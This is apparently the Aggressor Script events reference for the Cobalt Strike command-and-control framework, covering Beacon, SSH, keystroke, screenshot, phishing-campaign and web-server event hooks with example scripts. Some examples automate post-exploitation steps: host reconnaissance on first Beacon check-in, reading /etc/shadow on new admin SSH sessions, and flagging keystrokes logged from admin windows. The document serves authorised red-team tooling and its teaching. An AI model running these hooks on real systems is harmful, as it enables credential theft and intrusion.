Events

These are the events fired by Aggressor Script.

*

This event fires whenever any Aggressor Script event fires.

Arguments

$1 - the original event name

... - the arguments to the event

Example

# event spy script
on * {
   println("[ $+ $1 $+ ]: " . subarray(@_, 1));
}

beacon_checkin

Fired when a Beacon checkin acknowledgement is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_error

Fired when an error is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_indicator

Fired when an indicator of compromise notice is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

beacon_initial

Fired when a Beacon calls home for the first time.

Arguments

$1 - the ID of the beacon that called home.

Example

on beacon_initial {
   # list network connections
   bshell($1, "netstat -na | findstr \"ESTABLISHED\"");
 
   # list shares
   bshell($1, "net use");
 
   # list groups
   bshell($1, "whoami /groups");
}

beacon_initial_empty

Fired when a DNS Beacon calls home for the first time. At this point, no metadata has been exchanged.

Arguments

$1 - the ID of the beacon that called home.

Example

on beacon_initial_empty {
   binput($1, "[Acting on new DNS Beacon]");
 
   # change the data channel to DNS TXT
   bmode($1, "dns-txt");
 
   # request the Beacon checkin and send its metadata
   bcheckin($1);
}

beacon_input

Fired when an input message is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

beacon_mode

Fired when a mode change acknowledgement is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_output

Fired when output is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_output_alt

Fired when (alternate) output is posted to a Beacon's console. Alternate output is the same kind of message as normal output; it differs only in how it is presented.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_output_jobs

Fired when jobs output is sent to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the jobs output

$3 - when this message occurred

beacon_output_ls

Fired when ls output is sent to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the ls output

$3 - when this message occurred

beacon_output_ps

Fired when ps output is sent to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the ps output

$3 - when this message occurred

beacon_tasked

Fired when a task acknowledgement is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacons

Fired when the team server sends over fresh information on all of our Beacons. This occurs about once each second.

Arguments

$1 - an array of dictionary objects with metadata for each Beacon.

custom_event_<event name>

Fired when a client receives a custom event from another client.

Arguments

$1 - who sent the custom event

$2 - the event data

$3 - the time the event was sent

Example

# subscribe to the my-topic custom event
on "custom_event_my-topic" {
   println("Received my-topic:");
   println("\tSender: $1");
   println("\tData: $2");
   println("\tTimestamp: $3");
}

disconnect

Fired when this Cobalt Strike becomes disconnected from the team server.

event_action

Fired when a user performs an action in the event log. This is similar to an action on IRC (the /me command).

Arguments

$1 - who the message is from

$2 - the contents of the message

$3 - the time the message was posted

event_beacon_initial

Fired when an initial beacon message is posted to the event log.

Arguments

$1 - the contents of the message

$2 - the time the message was posted

event_join

Fired when a user connects to the team server.

Arguments

$1 - who joined the team server

$2 - the time the message was posted

event_newsite

Fired when a new site message is posted to the event log.

Arguments

$1 - who set up the new site

$2 - the contents of the new site message

$3 - the time the message was posted

event_notify

Fired when a message from the team server is posted to the event log.

Arguments

$1 - the contents of the message

$2 - the time the message was posted

event_nouser

Fired when the current Cobalt Strike client tries to interact with a user who is not connected to the team server.

Arguments

$1 - who is not present

$2 - the time the message was posted

event_private

Fired when a private message is posted to the event log.

Arguments

$1 - who the message is from

$2 - who the message is directed to

$3 - the contents of the message

$4 - the time the message was posted

event_public

Fired when a public message is posted to the event log.

Arguments

$1 - who the message is from

$2 - the contents of the message

$3 - the time the message was posted

event_quit

Fired when someone disconnects from the team server.

Arguments

$1 - who left the team server

$2 - the time the message was posted

heartbeat_10m

Fired every ten minutes

heartbeat_10s

Fired every ten seconds

heartbeat_15m

Fired every fifteen minutes

heartbeat_15s

Fired every fifteen seconds

heartbeat_1m

Fired every minute

heartbeat_1s

Fired every second

heartbeat_20m

Fired every twenty minutes

heartbeat_30m

Fired every thirty minutes

heartbeat_30s

Fired every thirty seconds

heartbeat_5m

Fired every five minutes

heartbeat_5s

Fired every five seconds

heartbeat_60m

Fired every sixty minutes

keylogger_hit

Fired when there are new results reported to the web server via the cloned site keystroke logger.

Arguments

$1 - external address of visitor

$2 - reserved

$3 - the logged keystrokes

$4 - the phishing token for these recorded keystrokes.

keystrokes

Fired when Cobalt Strike receives keystrokes.

Arguments

$1 - a dictionary with information about the keystrokes.

Key       Value
bid       Beacon ID for the session the keystrokes originated from
data      keystroke data reported in this batch
id        identifier for this keystroke buffer
session   desktop session from the keystroke logger
title     last active window title from the keystroke logger
user      username from the keystroke logger
when      timestamp of when these results were generated

Example

on keystrokes {
   # flag keystroke buffers captured from a window whose title mentions Admin
   if ("*Admin*" iswm $1["title"]) {
      blog($1["bid"], "Interesting keystrokes received. Go to \c4View -> Keystrokes\o and look for the green buffer.");
      highlight("keystrokes", @($1), "good");
   }
}

profiler_hit

Fired when there are new results reported to the System Profiler.

Arguments

$1 - external address of visitor

$2 - de-cloaked internal address of visitor (or "unknown")

$3 - visitor's User-Agent

$4 - a dictionary containing the applications.

$5 - the phishing token of the visitor (use &tokenToEmail to resolve to an email address)

ready

Fired when this Cobalt Strike client is connected to the team server and ready to act.

screenshots

Fired when Cobalt Strike receives a screenshot.

Arguments

$1 - a dictionary with information about the screenshot.

Key       Value
bid       Beacon ID for the session the screenshot originated from
data      raw screenshot data (this is a .jpg file)
id        identifier for this screenshot
session   desktop session reported by the screenshot tool
title     active window title from the screenshot tool
user      username from the screenshot tool
when      timestamp of when this screenshot was received

Example

# watch for any screenshots where someone is banking and
# redact it from the user-interface.
on screenshots {
   local('$title');
   $title = lc($1["title"]);

   if ("*bankofamerica*" iswm $title) {
      redactobject($1["id"]);
   }
   else if ("jpmc*" iswm $title) {
      redactobject($1["id"]);
   }
}

sendmail_done

Fired when a phishing campaign completes.

Arguments

$1 - the campaign ID

sendmail_post

Fired after a phish is sent to an email address.

Arguments

$1 - the campaign ID

$2 - the email we're sending a phish to

$3 - the status of the phish (e.g., SUCCESS)

$4 - the message from the mail server

sendmail_pre

Fired before a phish is sent to an email address.

Arguments

$1 - the campaign ID

$2 - the email we're sending a phish to

sendmail_start

Fired when a new phishing campaign kicks off.

Arguments

$1 - the campaign ID

$2 - number of targets

$3 - local path to attachment

$4 - the bounce-to address

$5 - the mail server string

$6 - the subject of the phishing email

$7 - the local path to the phishing template

$8 - the URL to embed into the phish

ssh_checkin

Fired when an SSH client checkin acknowledgement is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_error

Fired when an error is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_indicator

Fired when an indicator of compromise notice is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred
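
An added example, not from the original page, that serves both beacon_indicator (above) and ssh_indicator: it records every indicator-of-compromise notice to an append-only log file next to the script, so the operator has a complete record of artifacts to hand to the blue team and to clean up after the engagement. It assumes a file named indicators.log may be created beside the script, and that beacon_info resolves host details for SSH session IDs the same way it does for Beacon IDs.

```sleep
# append-only indicator log, stored next to this script (assumed filename)
$indicator_log = script_resource("indicators.log");

# write one line per indicator notice: time, kind, session, host, user, text
sub log_indicator {
   local('$kind $sid $user $text $when $handle $host $line');
   ($kind, $sid, $user, $text, $when) = @_;

   # host details come from the session model; assumed to work for SSH IDs too
   $host = beacon_info($sid, "computer");

   # keep one record per line even when the notice itself contains newlines
   $text = strrep($text, "\n", " ");
   $line = tstamp($when) . " [" . $kind . " " . $sid . " on " . $host . "] " . $user . ": " . $text;

   $handle = openf(">>" . $indicator_log);
   println($handle, $line);
   closef($handle);

   # mirror the record in the client console so the operator sees it immediately
   println("[indicator] " . $line);
}

on beacon_indicator {
   log_indicator("beacon", $1, $2, $3, $4);
}

on ssh_indicator {
   log_indicator("ssh", $1, $2, $3, $4);
}
```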

ssh_initial

Fired when an SSH session is seen for the first time.

Arguments

$1 - the ID of the session

Example

on ssh_initial {
   if (-isadmin $1) {
      bshell($1, "cat /etc/shadow");
   }
}

ssh_input

Fired when an input message is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

ssh_output

Fired when output is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_output_alt

Fired when (alternate) output is posted to an SSH console. Alternate output is the same kind of message as normal output; it differs only in how it is presented.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_tasked

Fired when a task acknowledgement is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

web_hit

Fired when there's a new hit on Cobalt Strike's web server.

Arguments

$1 - the method (e.g., GET, POST)

$2 - the requested URI

$3 - the visitor's address

$4 - the visitor's User-Agent string

$5 - the web server's response to the hit (e.g., 200)

$6 - the size of the web server's response

$7 - a description of the handler that processed this hit.

$8 - a dictionary containing the parameters sent to the web server

$9 - the time when the hit took place.